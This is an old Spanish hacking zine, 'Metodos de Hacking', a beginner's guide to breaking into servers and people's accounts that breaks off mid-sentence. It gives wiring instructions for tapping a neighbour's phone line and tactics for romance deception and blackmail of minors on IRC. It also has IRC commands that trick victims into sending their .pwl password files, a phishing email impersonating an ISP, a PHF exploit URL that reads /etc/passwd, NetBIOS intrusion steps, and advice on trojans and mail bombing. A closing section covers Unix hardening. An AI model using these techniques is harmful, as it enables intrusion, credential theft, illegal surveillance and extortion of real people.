                                                              
                                                                                             
                                                       
                             - D I S I D E N T S - H A C K  J O U R N A L -

                                               Numero 2                                                               
                          				  V	










								    TITLE: METODOS DE HACKING
                                                    Author:  PrOxYnE-X  and  ExIdE                               
                                                    DISIDENTS ESPAA 2001 -  LOS FUERA DE LA LEY





                                                                    
  			 ============================================================                     
                                                                                              
           		        -   M E T O D O S   D E   H A C K I N G  -                        
                                                                                              
			 ============================================================                     
                                                                                              
			 ============================================================                    
                                                                                              
 			     	      	by  PrOxYnE-X  and  ExIdE                               
                                                                                              
 			 ============================================================                    
                                                                                              
                                                                                              
                                                                                              
                                                                                              
                                                                                              
                                                                                              
	  ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
                                                                                              
  	   Nota : Ni yo, ni nadie que forme parte del equipo disidents                  
		    se hace responsable de la mala utilizacion de la                         
                informacion aqui expuesta ya que esta hecha para fines                    
		    fines puramente didacticos.                                                
                                                                                              
	  ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
                                                                                                
                                                                                              
                                                                                              
                                                                                              
                                                                                              
                                                                                              
    
Nuestros nombres son PrOxYnE-X y ExIdE y nos podeis podeis encontrar los canales
unix-linux del irc hispano, y atraves de los mails: proxyne@yahoo.es y orifize@terra.es.
                                                                                             
                                                                                             
Aqui encontrareis todas las tecnicas que deberias seguir para intentar hackear algun servidor,
con todos y cada uno de los metodos mas extendidos en el haking hoy en dia.
                                                                                             
Claro que se podria hacer un mucho mas grande, puesto que me he dejado varios temas sin tocar,
pero creo que tanto los principiantes como para los usuarios con concimientos medios podran
sacar algun provecho a esta guia, puesto que hay mucha variedad en cuestion de tecnicas.

                                                                                              
                                                                                              
 



-------------------------------------------------------------------------------------------------
------------[ INDICE ]---------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
----[1.0   ESPIONAJE                                                                            -
----[1.1   COMANDOS UNIX                                                                        -
----[1.2.0 TRASHING                                                                             -
----[1.2.1 FISICO                                                                               -
----[1.2.2 ELECTRONICO                                                                          -
----[1.3   SNIFFERS                                                                             -
----[1.4   PINCHAR LINEAS                                                                       -                    
----[1.5   INGENIERIA SOCIAL                                                                    -                             -
----[1.6   IRC                                                                                  -       -
----[1.7   TELEFONO                                                                             -                
----[1.8   CORREO                                                                               -            -
----[1.9   INGENIERIA SOCIAL POR MAIL                                                           -  
----[2.0   FAKE MAIL                                                                            -            -
----[2.1   ATAQUES REMOTOS EN WIN                                                               -                                                                                                             
----[2.2   FUERZA BRUTA                                                                         -    
----[2.3   CABALLOS DE TROYA                                                                    -              
----[2.4   MAIL BOMBING                                                                         -                  
----[2.5   NETBIOS                                                                              -                                                                                                           
----[2.6   FLOODING                                                                             -            
----[2.7   NUKEO                                                                                -        
----[2.8   AGUJEROS DE SEGURIDAD                                                                - 
----[2.9   ATAQUES Y SEGURIDAD EN UNIX                                                          -                                 
----[3.0   SEGURIDAD  BASICA EN UNIX                                                            -                              
----[3.0.1 SERVICIOS                                                                            -  
----[3.0.2 PERMISOS                                                                             -             
----[3.0.3 PASSWORDS                                                                            -               
----[3.0.4 MONITORIZACION DEL SISTEMA  Y REVISION DE  LOGS                                      -  
----[3.0.5 MEDIDAS ADICIONALES                                                                  -                         
----[3.1   ATAQUES TIPICOS A SISTEMAS UNIX                                                      -                                     
----[3.1.1 ATAQUES REMOTOS                                                                      -   
----[3.1.2 DENIAL OF SERVICE Y NUKES                                                            -                               
----[3.1.3 OBTENCION DE SHELL MEDIANTE CRACKEO                                                  -                                         
----[3.1.4 SNIFFING Y KEY RECORDING                                                             - 
----[3.1.5 CUENTAS POR DEFECTO                                                                  -                         
----[3.2   ATAQUES LOCALES                                                                      -                      
----[3.2.1 EXPLOITS                                                                             - 
----[3.2.2 TROYANOS Y DEMAS                                                                     -                     
----[3.2.3 ATAQUES "MANUALES"                                                                   -                        
----[3.2.4 OTROS                                                                                - 
----[3.3   CONCLUSIONES                                                                         -                  
----[3.4   DESPEDIDA                                                                            -               
-------------------------------------------------------------------------------------------------














                                                                               
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^^~^
                                                                                           

                                                                                              


-------------------------------------------------------------------------------------------------
------------[1.0   ESPIONAJE  ]------------------------------------------------------------------
-------------------------------------------------------------------------------------------------                                                                                              
                                                                                              
Este es el metodo de toda la vida, pero aplicado al hacking.                                   
                                                                                              





-------------------------------------------------------------------------------------------------
------------[1.1   COMANDOS UNIX ]---------------------------------------------------------------
-------------------------------------------------------------------------------------------------                                                                                         
                                                                                              
En esta seccion mencionare unos cuantos comandos de unix, que nos serviran para sacar 
informacion de un servidor en concreto. Para usarlos con mayor comodidad recomiendo unos
conocimientos minimos al menos de linux.                                                       
                                                                                              
                                                                                             
                                                                                        
Estas tecnicas son muy basicas, y a la vez muy utiles para cuando solo conocemos la url y 
poco mas.                                                                                     
                                                                                              
Comandos:                                                                              
                                                                                              
$ finger @victima.com		--> Diversa informacion sobre los usuaarios que estan conectados.
                                                                                              
$ nslookup www.victima.com 	--> Informacion sobre el servidor.                             
                                                                                              
$ whois www.victima.com		--> Informacon diversa.                                    
                                                                                              
$ showmount -e victima.com 	--> Informacion sobre lo que el servidor lleva montado.
                                                                                              
$ rpcinfo -p victima.com	--> Para averiguarr datos sobre el sowfware de seguridad,
				          el NIS, e informacion diversa.                                    
                                                                                              
$ tcpmap victima.com 		--> Para saber que servicios tcp tienen abiertos.
                                                                                              
 





-------------------------------------------------------------------------------------------------
------------[1.2.0  TRASHING ]-------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                                                                                                                                                                                                                                                                                                               
Consiste en buscar en la basura, pero las hay de dos tipos:                             
                                                                                              
-----[ 1.2.1 Basura Fisica                                          	                             
                                                                                              
De toda la vida. Si miramos en la basura de alguna empresa, o de algun sitio cuyo ordenador
nos interese hackear, podemos encontrar desde la hoja donde se apunto un password antes de 
que sea  memorizado, hasta telefonos y nombres para usarlos en la ingeniria social. Esta tecina 
solo se suele usar en casos en los que queremos hackear una maquina determinada cueste lo que
cueste, y la efectividad tambien depende de la constancia y la paciencia con la estemos mirando
la basura.                                                                                 
                                                                                              

------[ 1.2.2 Basura Electronica                                                                             
                                                                                              
Consiste en mirar los archivos del ordenador en lo que se apuntaron cosas interesantes de
tipo passwords, que aunque luego hayan sido destruidos, puede quedar algo en los ficheros 
tmp.                                                                                       
                                                                                              
                                                                                        
            






-------------------------------------------------------------------------------------------------
------------[1.3   SNIFFERS ]--------------------------------------------------------------------
-------------------------------------------------------------------------------------------------                                              
                                                                                        
Un sniffer es un programilla que captura todos los paquetes que pasan por una determinada 
red, almacenando todos los que cumplan ciertos requisitos, en archivos log.
                                                                                              
Por ejemplo los archivos correspondientes al proceso de login/password.                          
                                                                                              
En estos archivos suele haber mucha informacion sobre el sistema y su red, pero a veces
pueden resultar demasiado grandes por eso es conveniente revisarlos cada cierto tiempo
y luego dejarlos a 0 k.                                                                       
                                                                                              
Para hacer esto hace falta poner la tarjeta de red en modo promiscuo, aunque si no se hace
solo capturaras los paquetes de una sola maquina, no los de toda la red.
                                                                                              





-------------------------------------------------------------------------------------------------
------------[1.4   PINCHADO DE LINEAS ]----------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                                                                                                                                                                                                                                                   
(Texto sacado del grupo "the osorio team")                             
                                                                                       
Debers localizar su cable de telefonica, y pelarlo, (luego lo unes otra vez) de los 2
cables que vers, sacas un cable de cada uno (este cable es tuyo por que lo has comprado)
y te los llevas a un sitio donde puedas estar tu o tu "osorio box", que es una cosa 
inventada por mi que consiste en grabar sus conversaciones automticamente siempre que 
levante el telfono.                                                          
Necesitas tu roseta, y un telfono al que has desconectado permanentemente el micro 
(para que la victima no lo note). Bien, de los cables que van conectados al auricular 
del telfono sacas otros dos cables que conectas a un jack (son estos enchufes que 
sirven para conectar los auriculares a tu walkman). Y el jack lo conectas a la toma 
de micro externo de una grabadora, de esas de mano. Ahora te fijas en la alimentacin 
de la grabadora, de las tomas de positivo y negativo que hay en donde las pilas, sacas
otros dos cables (por aqu se alimentara la grabadora para que comience a funcionar),
bien ahora viene lo jodido, uno de los cables que sacaste de su lnea de telfono lo 
pones a la roseta, y al otro le pones una resistencia de 1K8 ohmios -  watio, que
venden en tiendas de electrnica y una vez puesta entre la resistencia y la roseta
metes un led de 1.5 voltios, como los led tienen dos patitas, los extremos de estas
van al cable, y a la mitad de las patitas, conectas los cables que habas puesto a 
la alimentacin de tu grabadora. En la grabadora habr ahora 1.5 voltios, pero como seguro
que no va a ese voltaje sino posiblemente a 3 voltios o a 4.5 voltios, conecta en serie a 
los cables de alimentacin de tu grabadora entre el led y la grabadora solo en un cable y
siguiendo la polaridad adecuada tantas pilas como necesites para completar el voltaje de
tu grabadora.                                                           
                                                                                       
Dejando en record tu grabador, esta slo grabar cuando alguien levante el telfono de tu 
vecino (y lgicamente se ponga a hablar)                             
                                                                                              
                                                                                        




-------------------------------------------------------------------------------------------------
------------[1.5   INGENIERIA SOCIAL  ]----------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                                                                              
                                                                                        
Esta tecnica si la sabes hacer bien, puede ser de las mas efectivas. 
Es muy usada por todo tipo de hackers, desde los que operan en el irc, hasta algunos
de los grandes hackers, con muy buenos resultados.                             
                                                                                              
Reglas                                                                       
                                                                                              
1 Antes de ir a por alguien, piensate lo que le quieres decir y lo que quieres hacer,
   Metete en tu papel, y luego lanzate al ataque.                             
                                                                                              
2 Llevate bien con tu victima en todo momento, nunca te enfades con el/ella.
                                                                                              
3 Antes de proponer nada a la victima, proponla tu algo parecido, y si es necesario
   dale algun passwrod/login falso o que acabes de hacer.                              
                                                                                              
4 Conoce a la victima todo lo que puedas, en cuanto mas sepas sobre el, sabras como 
   reaccionara y por tanto sabras cual es el momento indicado de atacar.
                                                                                              
5 No te fies de nadie, sobre todo en el irc, por que nadie es lo que apareta ser.                             
                                                                                              
                                                                                               



-------------------------------------------------------------------------------------------------
------------[1.6 IS IRC ]------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                                                                              
                                                                                             
                                                                                        
Es la mas facil, pero los resultados seran como mucho algun que otro telefono o password.
                                                                                              
Donde atacar:                                                                                    
                                                                                              
Canales en los que puedas ganarte facilmente la confianza de cualquier persona
Es de decir en los de ciudades, ligue etc                             
                                                                                              
Quien debo ser?                                                                              
                                                                                              
                                                                                              
- Si la victima es un chico, tu tienes que ser una chica, y no, pues al reves.
- Intenta ser delicado, simpatico, joven, alegre y sexy                             
- Sonriele en todo momento, y haz que se sienta superior a ti
- Hazle creer que tiene posibilidades de llegar a una amistad mas seria contigo
- Metete de lleno en tu papel: Hazte un mail especifico,                             
  consiguete una foto, para poder darsela y que se fie cada vez mas de ti,  inventante tu nombre,
  los apellidos,ciudad etc etc                                          
- Hazla parecer que te alegras cada vez que os veis y que verdaderamente le consideras 
  un amigo                                                                        
                                                                                              
Antes de proceder al ataque, mira los canales en los que esta metido, para averiguar como es y 
irte preparando una estrategia.                                          
                                                                                              
No intentes conseguirlo todo la primera vez, pasaros los mails, e ir viendos poco a
poco en el irc, y no intentes algo serio hasta que te tengas ganada su confianza.
                                                                                              
Luego puedes hacer varias cosas:                                                              
                                                                                              
1 Meterle un troyano:                                                                      
                                                                                              
Dale el troyano,  diciendo que es un programa iteresante, y que lo pruebe, por ejemplo.
Cuando se llegan a ciertas cotas de confianza esta tecnica nunca falla.
                                                                                              
2 Pedirle los passwords:                                                                     
                                                                                              
Dile que esa es tu unica oportunidad para conectarte, puesto que no sabes hacerte una
cuenta nueva y si no, no os podriais ver nunca mas.                             
                                                                                              
3 Chantaje:                                                                                  
                                                                                              
Pidele el nombre entero, y en caso de que viva con sus padres, pidele el nombre de su padre.
Luego usa las paginas blancas: www.paginas-blancas.es y mira alli su direccion, y su telefono,
Luego con esta direccion puedes pedirles los passwords amenazandole de que si no te los da, le 
aras ciertas llamadas a ciertas horas de la noche, por ejemplo, o que le mandaras "regalitos" 
a su correo. Tendras mas posibilidades de triunfar sobre todo si, el chaval es menor y vive
con sus padres, pero entonces tendra com mucho un password de conexion y otro de mail, 
pero si no, puedes hasta pillarlos passwords de alguna que otra web interesante.
                                                                                              
Para hacer esto, no hace falta profundizar mucho en la amistad de una persona.
                                                                                              
Esta tecnica es algo ruin y miserable, pero si queremos destrozar alguna web de contenidos 
racitstas/pedrastras etc y conocemos a su autor, entonces yo si usaria esta tecnica.
                                                                                              
Otra cosa importante si llamas harlo o desde una cabina  o marcando delante el 067+  para lineas 
RTB y *31# o #31#  para RDSI o GSM.                                                          
                                                                                              
4 Hazerle ingresar en su promt alguno de estos comandos:                             
                                                                                              
- /msg nickserv kill   - Quita el registro a su nick (por si te interesa hacerte pasar por el)
                                                                                                
- /send c:\windows\*.*pwl tu_nick   - Te manda sus archivos pwl                             
                                                                                              
- /fserve tu_nick 5 c:\   - Abre un fserver en su ordenador                             
                                                                                              
                                                                                              

-------------------------------------------------------------------------------------------------
------------[1.7 INGENIERIA SOCIAL POR TELEFONO ]------------------------------------------------
-------------------------------------------------------------------------------------------------
                                                                                                                                                                                                                                                                             
Lo primero: marca delante el 067+  para lineas RTB y *31# o #31#  para RDSI o GSM.
                                                                                              
- Nuestra voz: segura, seria, madura, y hablar deprisa sin titubear. Estas cualidades se 
  pueden ganar ensallando lo que vamos a decir antes de la llamada.                             
                                                                                              
- Antes de hacer la llamada debemos apuntar o memorizar todas las cosas que debemos decir,
  asi como nuestras contestaciones a todas sus posibles respuestas.                             
                                                                                              
- Habla elgantemente, con cortesia, y sin tutear.                             
                                                                                              
- Tienes que ganarte su confianza (como en todo), si duda de ti, dila que lo compruebe
  llamando a cualquier sitio etc                                          
                                                                                                




-------------------------------------------------------------------------------------------------
------------[1.9 INGENIERIA SOCIAL POR MAIL ]----------------------------------------------------
-------------------------------------------------------------------------------------------------                                                                                              
                                                                                        
Generalmente se suele usar para pedir los paswords de una cuenta correo haciendote pasar por
el ISP, creandote un mail que de el pego.                                                     
por ejemplo: terra.mail@terra.es; mail.services@terra.es; root.mail@terra.es
                                                                                              
Los mails que mandes desde ahi, a otros correos de terra, sera interpretados como un mensaje
de los propios encargados de terra.                                          
                                                                                              
EL texto del mensaje tiene que ser elegante, hablar con contersia y justificando el por que 
de mandar el password del mail.                                          
                                                                                              
Por ejemplo:                                                                       
                                                                                              
"Querido usuario pedro:                                                                       
                                                                                              
Debido a los ataques que ha sufrido nuestro servior (terra) por parte de ciertos piratas
informaticos tememos la posibilidad de que ciertas cuentas de correo no funcionen correctamente.
Por eso  le rogamos que nos mande el password de su correo para poder verificarlo y 
comprobar que su mail no ha sido modidificado.                             
                                                                                              
Gracias por anticipado                                                                       
                                                                                              
Atentamente, Alonso (director de terra.es)"                                          
                                                                                              
Es posible que tegamos que volver a mandar otro mail insistiendo, y amenazando de 
retirarle la cuenta por que no siempre es facil convencerle la primera vez.
                                                                                              
Este es uno de los muchos ejemplos que podemos usar para convencer a alguien de que nos 
mande sus contraseas, aunque por desgracia este metodo esta demasiado visto,
y no es muy dicifil que nos pillen.                                          


 

-------------------------------------------------------------------------------------------------
------------[2.0 FAKE MAIL ]---------------------------------------------------------------------
-------------------------------------------------------------------------------------------------                                                                                             
                                                                                    
                                                                                              
Este es el arte de mandar mensajes, a nombre de otro persona. El problema es que cuando nos
manden el mensaje, ira al email de esa otra persona.                              
                                                                                              
Un programa interesante que cumple perfectamente esta tarea es el "AnonyMail",
no muy dificil dencontrar por internet.                                          
                                                                                              
                                                                                           
                                                                                        
                             
-------------------------------------------------------------------------------------------------
------------[2.1   ATAQUES REMOTOS EN WINDOWS ]--------------------------------------------------
-------------------------------------------------------------------------------------------------



-------------------------------------------------------------------------------------------------
------------[2.2   FUERZA BRUTA ]----------------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                                                                              
                                                                                       
Consiste en ir probando todos los passwords uno a uno, generalmente conociendo algo ala la 
personaque los ha puesto, y asi sacar todas las posibilidades, por ejemplo si la persona 
nacio en el 1950 se llama juan jose, esta casado con maria, deberiamos de calcular todas las 
posibilidades que pueden resultar, juntando todas esas palabras y tambien por separado.
                                                                                              
Aunque no lo parezca este metodo es efectivo si se tiene paciecia, sobre todo para 
los mail y para los fichero de word, excel, zip etc.                             
                                                                                              
Conozco a gente que llamandose "Noelia" su password a ha sido "noe".                             
                                                                                              
Algunos de las grandes entradas a ordenadores importantes has sido mediante este metodo.
                                                                                              
Tambien hay algunos programas que hacen todas estas combinaciones, ahorrandonos asi el trabajo 
por ejemplo:                                                                                       
                                                                                              
Aw97pr ( avanced word 97 password recovery )- para fiecheros de words                             
Azpr - ( avanced zip password recovery )- para ficheros zip                             
                                                                                              
Podras encontrar otros muchos craqueadores de passwords en www.vanhacker.com
                                                                                                
                                                                                              




-------------------------------------------------------------------------------------------------
------------[2.3   CABALLOS DE TROYA  ]----------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                                  
                                                                                              
Estos juguetitos, bastante utiles, nos permiten despues de haber instalado una parte de ellos
en un ordenador, nos permite acceder a el. Muy utill sobre todo, para cuando hemos explotado un
bug en un sitema operativo, dejamos el troyano, y la proxima vez podremos acceder mas facilmente.
                                                                                              
Cuando nuestros conocimientos de informatica sean mas avanzados, podremos crearnos
nosotros mismos los troyanos, y asi sera mas dificil que nos los pillen.
                                                                                              
Los mas famosos son el Netbus, Back orifice, Deeptroath, y Subseven (sub7)
                                                                                              
Otra de las maneras de colarsela a una persona, es como no, por ingenieria social.
                                                                                              
El problema es que hoy en dia, todos los antivirus los reconocen, por eso mismo, sigo insitiendo
en que si podeis, los hagais vosotros mismos.                             
                                                                                              
Como su uso es muy sencillo, no hace falta explicarlo, aparte de que hay cientos de manuales 
por ahi rondando.                                                          
                                                                                              
                                                                                        
                                                                                              


-------------------------------------------------------------------------------------------------
------------[2.4   MAIL BOMBING ]----------------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                                                                                                                                     
                                                                                        
Esta tecnica mas que de un hacker es es un lamer. Consiste en bombardear una cunta de correo con
montones de mails y cuanto mas ocu`pen cada uno de estos, mejor.
                                                                                              
NO es muy util, puesto que no se gana nada con ella, aunque se puede usar para inabilitar el mail
de alguna pagina web durante una pequea temporada.                             
                                                                                              
El programa Haktek, te puede hacer esto sin problemas, pero si lo haces desde algun ciber o
desde algun sitio que no tenga mucho que ver contigo, mejor.                             
                                                                                              




-------------------------------------------------------------------------------------------------
------------[2.5   NETBIOS ]---------------------------------------------------------------------
-------------------------------------------------------------------------------------------------                                                                                              
                                                     
                                                                                                                                                                                     
Para acceder a una red de windows, que no este configurada correctamente, podemos colarnos
usando netbios.                                                          
                                                                                              
Para eso debemos tener instalados en Panel de control/red los siguientes protocolos:
                                                                                              
- Compartir ficheros e impresoras en redes de microsoft                             
- Cliente para redes microsoft                                                          
- El inicio de la sesion tiene que estar en "Cliente para redes microsfot"
                                                                                              
Para usar tan solo debemos saber la IP de la victima, y que su red no este muy bien configurada.
                                                                                              
Una vez que este todo correctamente configurado abrimos una ventana de MS-DOS, y ponemos:
                                                                                              
c:\>nbtstat -A (ip de la victima)                                                          
                                                                                              
y nos saldra algo como:                                                          
                                                                                              
    Name           	  Sufijo 	 Tipo   	   Status
    ----------------------------------------------------------------
    Maquina-remota   	 <00>   	 UNIQUE   	  Registered                             
    MaquinaGrupo     	 <00>   	 GROUP    	  Registered                             
    Maquina-remota   	 <03>   	 UNIQUE   	  Registered                             
    Maquina-remota   	 <20>   	 UNIQUE   	  Registered                             
    Maquinagrupo     	 <1E>   	 GROUP    	  Registered                             
                                                                                              
                                                                                              
EL unique 00, nos dice el nombre de la maquina.                             
                                                                                              
Ahora para saber que recursos comparte la maquina ponemos:                             
                                                                                              
c:\>net view \\Maquina-remota                             
                                                                                              
y nos saldra una lista con todo lo que comparte.                             
                                                                                              
Ahora haciendo uso de esa lista, ya solo nos queda movernos por su disco duro, como si
del nuestro se tratara.                                                          
                                                                                              
Para aadir esa maquina a nuestro netbios ponemos:                             
                                                                                              
c:\>NBTSTAT -R                                                          
                                                                                       
EL problema de usar este ultimo comando, es que la maquina remota, tendra mas facilidad para
pillarnos, por eso no es muy aconsejable hacerlo.                             
                                                                                              
Aunque, es dificil que nos pillen puede ocurrir perfectamente, pero como solo se necestia el 
windows y una configuracion sencilla, podemos realizar este ataque desde casi cualquier ciber.
                                                                                              
                                                                                             




-------------------------------------------------------------------------------------------------
------------[2.6   FLOODING ]--------------------------------------------------------------------
-------------------------------------------------------------------------------------------------                                                        
                                                                                              
                                                                                        
Sirver parabloquear los diversos servicios de un ordenador saturandolos con peticiones de datos.
                                                                                              
No es excesivamente peligroso, pero si util para inutilizar un server. 
                                                                                              
Una de las muchas maneras es el mail bomber, que ya hemos hablado de el.
                                                                                              
                                                                                              






-------------------------------------------------------------------------------------------------
------------[2.7   NUKEO  ]----------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                                       
                                                                                                                                                                                     
Mandar mensajes ICMP y TCP para  hacer resetearla conexiones de diversos puertos.
                                                                                              
 



-------------------------------------------------------------------------------------------------
------------[2.8   AGUJEROS DE SEGURIDAD  ]------------------------------------------------------
-------------------------------------------------------------------------------------------------                                                                                             
                                                                                                                                    
                                                                                        
Entrar a un sistema, mediante la explotacion de un agujero de seguridad es uno de los
metodos mas usados.                                                          
                                                                                              
Aunque tampoco es un chollo, por que existen acctualizaciones constantes que nos impiden entrar,
siempre hay paginas con algun root despistado, que no lleva todas las actualizaciones al dia.
                                                                                              
Los bugs mas famosos son el del PHF que consiste en introducir una linea de texto a la url, 
que pide los archivos de password.                                                          
Esa linea es: /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwdy no os molesteis enprobarlo 
a mano poque es casi imposible pillar un servidor con este bug.
                                                                                              
Otro parecido es el del unicode, es bastante mas efectivo hoy en dia, y consiste en aadir
otras lineas de texto.                                                          
                                                                                              
Pero hay muchos mas bugs. Los puedes cojer desde en las zines hasta en paginas especificas
que tienen cientos de bugs como: http:\\www.rootshell.com 
                                                                                              
Yo os recomiendo que os hagais vuestro propio recopilatorio de bugs, clasificandolo 
como os venga en gana, y asi, cuando querais entrar en un sistema los probais todos,
haber si hay suerte.                                                          
                                                                                              
                                                                                              
                                                             





-------------------------------------------------------------------------------------------------
------------[2.9   ATAQUES Y SEGURIDAD EN UNIX ]-------------------------------------------------
-------------------------------------------------------------------------------------------------


INTRODUCCION:
===================================================                                          
	
	En los ultimos aos la seguridad informatica se ha converido en un tema muy importante,
lo que ha hecho que la gente se conciencie y se preocupe cada vez mas por esta. Hoy en dia es 
relativamente sencillo para un intruso acceder a un sistema informatico (aunqe sea un trusted
xenix en persona) mal administrado sin tener grandes conocimientos de informatica. Que como 
es esto? Pues con la proliferacion de wanabe hackers y la aparicion de sencillas herramientas 
qe automaticamente explotan fallos de seguridad automaticamente.Estos atacantes tan frequentes
se echaran para atras en cambio si se ecuentran con un sistema fuerte y bien protegido, y solo 
si se trata de un pirata serio segira intentandolo, y contra un pirata de verdad poco se puede
hacer ;).
	
	Este texto versa sobre seguridad en sistemas unix/linux (principalmente linux) y obviara
a los usuarios de win2, porque considero que en win2 es una tonteria hablar de seguridad. por 
ultimo decir que este texto no esta dedicado al ataque de sistemas, sino a su defensa.Esperamos 
qe te sea util.






-------------------------------------------------------------------------------------------------
------------[3.0  SEGURIDAD BASICA  EN UNIX  ]---------------------------------------------------
-------------------------------------------------------------------------------------------------

	Teniendo en cuenta lo extenso del tema aqui tratare muy por encima el tema, simplemente
dare nociones basicas orientadas a saber que hay que vigilar. Si quieres profundizar en el tema
te recomeindo que te pases por paginas como rootshell.com etc... o por paginas dedicadas a
tu sisteam unix. Estos consejos estan orientados a prevenir, y no se explica como actuar 
una vez producido el ataque.
  



-------------------------------------------------------------------------------------------------
------------[3.0.1 SERVICIOS ]-----------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                        	
	Lo primero que tenemos que tener en cuenta al administrar un sistema unix es saber de 
antemano que servicios qeremos ofrcer. Si nuestra maquina no va a ofrecer servicio de 
accounting es ridiculo que tengamos el puerto de telnet abierto. Para cerrar los servicios 
qe no ofrezcamos tenemos que editar el archivo inetd.conf coemntando aqellos que no necesitemos. 
Hay puertos que no podemos cerrar editand el inetd, con lo cual tenemos la necesidad de 
filtrar paquetes (firewalling). Si tu sistema es cualquier distro de linux esto es muy 
facil si optas por el uso de ipchains, los paquetes se clasifican asi:

*input: paquete proveniente del exterior de la red
*forward: paquetes provenientes del interior de la red
*output: paquetes con destino al exterior de la red

Los paquetes pueden ser aceptados o rejectados (u otras muchas cosas) en funcion de su origen, 
destino, protocolo etc... mediante unas reglas que crearemos emdiante una sencilla sintaxis. 
(para mas info man ipchains ;). Otro metodo para filtrado de paqetes es usar tcp wrappers, 
para usar estos hemos de indicar las reglas en /etc/hosts.allow y host.deny. Si lo que qeremos
es cerrar el sistema a lo bestia incluimos en host.deny ALL:ALL y no poner nada en host.allow.
Pero lo mejor es incluir ALL:ALL en host.deny y indicar los servicios que qeramos ofrecer en
host.alow. porqe lee primero este archivo, ademas podemos incluso indicar que ante una 
conexion a determiando puerto ejecute un coamndo de shell... :) . Indicar que para que 
un servicio cuente con filtrado mediante tcp-wrappers hay que asignar en inetd.conf el 
demonio tcpd al servicio en cuestion y despues indicarle que tras el filtrado pase el 
control al demonio correspondiente al servicio.
  




-------------------------------------------------------------------------------------------------
------------[ 3.0.2 PERMISOS ]-------------------------------------------------------------------
-------------------------------------------------------------------------------------------------

	En este tema no profundizare mucho por considerarlo evidente :). Solo subrayar
 que directorios como /root y /home/xx deben tener modo 750 y otros como /etc /bin... 
deben estar en modo 750. Otro tema a tener en cuenta es revisar los archivos con
suid o gid activos, y eliminar aqellos que no sean imprescindibles. Decir que si 
un archivo es necesario que tenga el suid activo suele ser conevniente aadirle 
el sticky bit (para directorios etc..) para que solo pueda modificarlo el
propietario. Combiene de vez en cuando ejecutar el comando $ find / -perm 4000 -o 
-perm 2000 para realizar un segimiento de estos peligrosos programas.
  





-------------------------------------------------------------------------------------------------
------------[ 3.0.3 PASSWORDS  ]-----------------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                        	
	Aparte decir que los password han de ser largos, con caracteres como $%  y
demas (lo de siempre xD) quiero hablar un poco de los distintos tipos de identificacion de 
usuarios:
  
   -contraseas: es el metodo tipico de identificacion. El sistema alamcena las contraseas
y cuando un usuario quieres conectarse se l pide un login y el pass para comprobar que es 
qien dice ser. Los sistemas actuales tienen caracteirticas de seguridad adicionales, por
ejemplo las passwd estan encriptadas con el sistema md5, se almacenan en /etc/shadow (u
otros segun version, por ejm en freeebsd /etc/master.passwd) de forma que solo pueden
ser obsevadas por el superusuario etc... El problema esta en que si un atacante logra
una de las paswd el sistema le dara acceso como si de el ususraio otriginal se tratase
   
   -identificacion biometrica: Este sistema es muy eficaz, no existe el riego de que 
una persona se haga pasar por otra obteniendo su passwd. Este tipo de identificacion al
contrario de lo que se suele pensar no toma una imagen exacta, sino que traza lineas entre
diferentes puntos y despues comprueba si concuerdan con las de la persona a identificar. 
Existen varias variantes como identificacion por retina coular, por voz, huella dactilar etc..
 




-------------------------------------------------------------------------------------------------
------------[3.0.4 MONITORIZACION DEL SISTEMA  Y REVISION DE  LOGS ]-----------------------------
-------------------------------------------------------------------------------------------------
 
                                         
	Existen diversos metodos de monitorizacion del sistema, desde metodos tan sencillos
como w o who, pasando por otros mas eficaces como el uso de tcpdump, hasta complejos
metodos de monitoruizacion de terminales por medio de sniffers y otros. Un excelente 
aliado para la monitorizacion del sistema es tcpdump (y otros similares), que monitoriza
todo el trafico de red en la interfaz que le indiqemos, la cantidad de info que nos puede 
dar este tipo de programas es ingente, por lo que debemos acotar un poco la informacion a recibir. 
	Respecto a la revision periodica de los logs dire que un aliado inprescindible
apara el root es el demonio syslogd. Este demonio registra toda la informacion en
archivos segun le indiquemos en /etc/syslog.conf. Generalmente en linux la informacion 
qe nos da este demonio se encuentra en /var/logs/syslog. Tambien es bueno revisar los
logs referentes a los logins fallidos etc..
   





-------------------------------------------------------------------------------------------------
------------[3.0.5 MEDIDAS ADICIONALES ]---------------------------------------------------------
-------------------------------------------------------------------------------------------------

	
	Con todo lo anterior consegiremos un sistema fiable pero no imprenetrable, si ademas 
tienes que ofrecer servicios como ftp etc.. seras mas vulnerable aun, por lo que es 
recomendable tomar medidas adicionales como realizar copias de seguridad periodicamente,
instalar firewalls tipo hardware, routing etc... Tambien hay que prestar atencion en 
eliminar las cuentas de usuarios que no se coenctan, passwod por defecto etc.. El ultimo 
punto que considero importante es elegir bien el sistema a instalr, si qieres un sistema 
fiable es conveniente poner freebsd openbsd, solaris y demas, no pidas seguridad si tienes 
la corel linux instalda ;)






-------------------------------------------------------------------------------------------------
------------[3.1   ATAQUES TIPICOS A SISTEMAS UNIX ]---------------------------------------------
-------------------------------------------------------------------------------------------------
                                          
	
	Esta seccion no pretendo que sea un "como hackear un unix" sino simplemente una pequea
referencia para que los que qieran adentrarse en la administracion de sistemas sepna lo qe
les espera ahi fuera. Asi que si lo que buscas es un manual de hack estas perdiendo el tiempo,
porqe aqi no desarrolare los ataqes, solo los coemntare brevemente.






-------------------------------------------------------------------------------------------------
------------[3.1.1 ATAQUES REMOTOS  ]------------------------------------------------------------
-------------------------------------------------------------------------------------------------                                      

        Por ataque remoto se entiende todo aquel ataqe proveniente de una entidad que carece de
acceso "legal" al sistema y ejecuta el ataque o bien desde su terminal o bien accediendo a la
terminal objetivo como usuario no privilegiado (por ejemplo guest). Estos ataques por si solos
no constituyen un gran problema ya que en raras ocasiones comprometen privilegios de root, pero 
